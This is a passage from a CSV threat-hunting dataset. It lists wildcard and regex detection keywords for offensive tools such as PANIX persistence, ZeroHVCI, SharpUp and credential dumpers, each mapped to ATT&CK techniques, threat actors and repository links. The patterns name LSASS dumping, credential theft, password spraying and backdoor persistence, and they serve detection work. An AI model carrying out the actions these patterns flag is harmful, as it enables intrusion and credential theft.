tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","19941" "*\zero.exe *ProgramData*",".{0,1000}\\zero\.exe\s.{0,1000}ProgramData.{0,1000}","offensive_tool_keyword","zerologon","Zerologon CVE exploitation","T1210 - T1072","TA0008","N/A","Dispossessor","Exploitation tool","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","19949" "*\ZeroHVCI.cpp*",".{0,1000}\\ZeroHVCI\.cpp.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","0","N/A","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","19950" "*\ZeroHVCI.exe*",".{0,1000}\\ZeroHVCI\.exe.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","0","N/A","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","19951" "*\ZeroHVCI.sln*",".{0,1000}\\ZeroHVCI\.sln.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","0","N/A","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","19952" 
"*\ZeroHVCI-master*",".{0,1000}\\ZeroHVCI\-master.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","0","N/A","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","19953" "*\zerologon.py*",".{0,1000}\\zerologon\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","19954" "*\ZipExec -*",".{0,1000}\\ZipExec\s\-.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","19955" "*\ZipExec.exe*",".{0,1000}\\ZipExec\.exe.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","19956" "*\ZipExec.go*",".{0,1000}\\ZipExec\.go.{0,1000}","offensive_tool_keyword","ZipExec","A unique technique to execute binaries from a password protected zip","T1560.001 - T1204.002 - T1059.005","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/Tylous/ZipExec","1","0","N/A","N/A","9","10","1026","153","2022-07-01T16:25:26Z","2021-10-19T21:03:44Z","19957" "*] - caution! this means that exploit is not fileless*",".{0,1000}\]\s\-\scaution!\sthis\smeans\sthat\sexploit\sis\snot\sfileless.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","19976" "*] Already in high integrity, no need to privesc!*",".{0,1000}\]\sAlready\sin\shigh\sintegrity,\sno\sneed\sto\sprivesc!.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","19977" "*] Already in high integrity, no need to privesc!*",".{0,1000}\]\sAlready\sin\shigh\sintegrity,\sno\sneed\sto\sprivesc!.{0,1000}","offensive_tool_keyword","SharpUp","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpUp","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","19978" "*] an up-to-date backdoor is active on *",".{0,1000}\]\san\sup\-to\-date\sbackdoor\sis\sactive\son\s.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","19979" "*] Any passwords that were successfully sprayed have been output to *",".{0,1000}\]\sAny\spasswords\sthat\swere\ssuccessfully\ssprayed\shave\sbeen\soutput\sto\s.{0,1000}","offensive_tool_keyword","DomainPasswordSpray","DomainPasswordSpray is a tool written in PowerShell to perform a password spray attack against users of a domain.","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/DomainPasswordSpray","1","0","N/A","N/A","10","10","1865","388","2024-07-11T18:18:57Z","2016-10-04T23:37:37Z","19980" "*] Attempting stealthy LSASS dump*",".{0,1000}\]\sAttempting\sstealthy\sLSASS\sdump.{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#content","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","19981" "*] Attempting to enumerate logged on users on *",".{0,1000}\]\sAttempting\sto\senumerate\slogged\son\susers\son\s.{0,1000}","offensive_tool_keyword","GetLoggedOnUsersRegistry","PoC To enumerate logged on users on a remote system using the winreg named pipe","T1087 - T1018 - T1057","TA0007 - 
TA0008","N/A","N/A","Discovery","https://gist.github.com/RalphDesmangles/22f580655f479f189c1de9e7720776f1","1","0","N/A","N/A","8","8","N/A","N/A","N/A","N/A","19982" "*] Bruteforcing %d CLSIDs*",".{0,1000}\]\sBruteforcing\s\%d\sCLSIDs.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","19983" "*] Check for ADCS Vulnerabilities*",".{0,1000}\]\sCheck\sfor\sADCS\sVulnerabilities.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","N/A","5","4","389","106","2025-04-08T06:17:54Z","2018-04-20T11:29:06Z","19984" "*] Cleaning At persistence methods*",".{0,1000}\]\sCleaning\sAt\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19985" "*] Cleaning Backdoor binaries persistence methods*",".{0,1000}\]\sCleaning\sBackdoor\sbinaries\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19986" "*] Cleaning Bind shell persistence methods*",".{0,1000}\]\sCleaning\sBind\sshell\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19987" "*] Cleaning Cron persistence methods*",".{0,1000}\]\sCleaning\sCron\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19988" "*] Cleaning Docker persistence methods*",".{0,1000}\]\sCleaning\sDocker\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19989" "*] Cleaning Git persistence methods*",".{0,1000}\]\sCleaning\sGit\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 
- T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19990" "*] Cleaning initd persistence methods*",".{0,1000}\]\sCleaning\sinitd\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19991" "*] Cleaning Malicious package persistence methods*",".{0,1000}\]\sCleaning\sMalicious\spackage\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19992" "*] Cleaning MOTD persistence methods*",".{0,1000}\]\sCleaning\sMOTD\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19993" "*] Cleaning Package Managers persistence 
methods*",".{0,1000}\]\sCleaning\sPackage\sManagers\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19994" "*] Cleaning rc.local persistence methods*",".{0,1000}\]\sCleaning\src\.local\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19995" "*] Cleaning setcap persistence methods*",".{0,1000}\]\sCleaning\ssetcap\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19996" "*] Cleaning Setuid persistence methods*",".{0,1000}\]\sCleaning\sSetuid\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19997" "*] Cleaning Shell profile persistence methods*",".{0,1000}\]\sCleaning\sShell\sprofile\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19998" "*] Cleaning SSH persistence methods*",".{0,1000}\]\sCleaning\sSSH\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","19999" "*] Cleaning Sudoers persistence methods*",".{0,1000}\]\sCleaning\sSudoers\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","20000" "*] Cleaning Systemd Generator persistence methods*",".{0,1000}\]\sCleaning\sSystemd\sGenerator\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux 
persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","20001" "*] Cleaning Systemd persistence methods*",".{0,1000}\]\sCleaning\sSystemd\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","20002" "*] Cleaning udev persistence methods*",".{0,1000}\]\sCleaning\sudev\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","20003" "*] Cleaning XDG persistence methods*",".{0,1000}\]\sCleaning\sXDG\spersistence\smethods.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","20004" "*] Cleared all rat command 
queues!*",".{0,1000}\]\sCleared\sall\srat\scommand\squeues!.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","20005" "*] Cloning GPO * from fakedc ",".{0,1000}\]\sCloning\sGPO\s.{0,1000}\sfrom\sfakedc\s","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","N/A","10","2","112","14","2025-03-29T14:20:38Z","2024-04-17T10:18:04Z","20006" "*] Collecting Krbtgt*",".{0,1000}\]\sCollecting\sKrbtgt.{0,1000}","offensive_tool_keyword","Invoke-ADEnum","Automate Active Directory Enumeration","T1016 - T1482","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ADEnum","1","0","N/A","N/A","7","5","448","50","2025-04-09T10:13:47Z","2023-04-18T11:19:42Z","20007" "*] compile geacon with the public key from .beacon_keys*",".{0,1000}\]\scompile\sgeacon\swith\sthe\spublic\skey\sfrom\s\.beacon_keys.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","20008" "*] Completed Privesc Checks in *",".{0,1000}\]\sCompleted\sPrivesc\sChecks\sin\s.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","20009" "*] Copying lsass dump*",".{0,1000}\]\sCopying\slsass\sdump.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","0","#content","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","20010" "*] CreateService by Uknow*",".{0,1000}\]\sCreateService\sby\sUknow.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#content","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","20011" "*] Defaulting port to 1337*",".{0,1000}\]\sDefaulting\sport\sto\s1337.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","20013" "*] DHCP sniffer identified potential spoofing target:*",".{0,1000}\]\sDHCP\ssniffer\sidentified\spotential\sspoofing\starget\:.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","20014" "*] DHCP Sniffer identified previously sniffed 
name: *",".{0,1000}\]\sDHCP\sSniffer\sidentified\spreviously\ssniffed\sname\:\s.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","20015" "*] Dumping browsers credentials ..*",".{0,1000}\]\sDumping\sbrowsers\scredentials\s\.\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","20016" "*] Dumping mail serv credentials ..*",".{0,1000}\]\sDumping\smail\sserv\scredentials\s\.\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script 
content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","20017" "*] Dumping messenger credentials ..*",".{0,1000}\]\sDumping\smessenger\scredentials\s\.\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","20018" "*] dumping runtime core memory of the root smart contract*",".{0,1000}\]\sdumping\sruntime\score\smemory\sof\sthe\sroot\ssmart\scontract.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","20019" "*] Dumping secrets for: *Username: *",".{0,1000}\]\sDumping\ssecrets\sfor\:\s.{0,1000}Username\:\s.{0,1000}","offensive_tool_keyword","secretsdump","secretdump.py from impacket - https://github.com/fortra/impacket","T1003.003","TA0006","Operation Wocao","Black Basta - Rhysida - HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - ALLANITE","Credential 